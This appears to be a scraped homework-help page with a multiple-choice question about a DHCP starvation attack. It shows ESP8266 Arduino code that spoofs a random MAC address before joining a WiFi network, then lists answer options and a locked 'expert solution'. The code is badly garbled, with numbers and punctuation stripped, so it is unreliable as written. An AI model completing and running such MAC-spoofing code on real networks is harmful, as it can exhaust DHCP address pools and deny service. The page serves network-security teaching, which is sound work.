Question: [ DHCP Starvation Attack ] The following code can be used to convert a ESP 8 2 6 6 IoT device to a DHCP Starvation
DHCP Starvation Attack
The following code can be used to convert a ESP IoT device to a DHCP Starvation attacker. Please read and understand its logic, then select the true statements.
#include
const char ssid "CrackCYxxx";
const char password "Everyonecanbreakme";
void setup
Serial.begin; delay; Serial.println; Serial.println;
Without setting the STA mode, the AP's macaddr will be changed
WiFi.modeWIFISTA;
uintt mac;
for sizet i ; i ; i
maci random;
mac mac & ~x;
wifisetmacaddrSTATIONIF &mac; Using a random and fake MAC address to make the DHCP server think the request is from another machine
Serial.printMAC address is ;
Serial.printlnWiFimacAddress;
WiFihostnameAwesomeSensor;
Serial.printConnecting to ;
Serial.printlnssid;
WiFi.beginssid password;
while WiFistatus WLCONNECTED
delay;
Serial.print;
Serial.println;
Serial.printlnWiFi connected";
Serial.printlnIP address: ;
Serial.printlnWiFilocalIP;
void loop
Group of answer choices
The WiFi client device must know the WiFi password before it can initiate a DHCP Request
The ESP IoT device will work at the WiFi APSTA mode if we want it to conduct the DHCP Starvation attack.
The device will work as a WiFi client device ie a WiFi STA
To trigger a new DHCP request and make it acceptable to the DHCP server, a new but different MAC address should be used in theDHCPrequest
Step by Step Solution
There are 3 Steps involved in it
1 Expert Approved Answer
Step: 1 Unlock
Question Has Been Solved by an Expert!
Get step-by-step solutions from verified subject matter experts
Step: 2 Unlock
Step: 3 Unlock
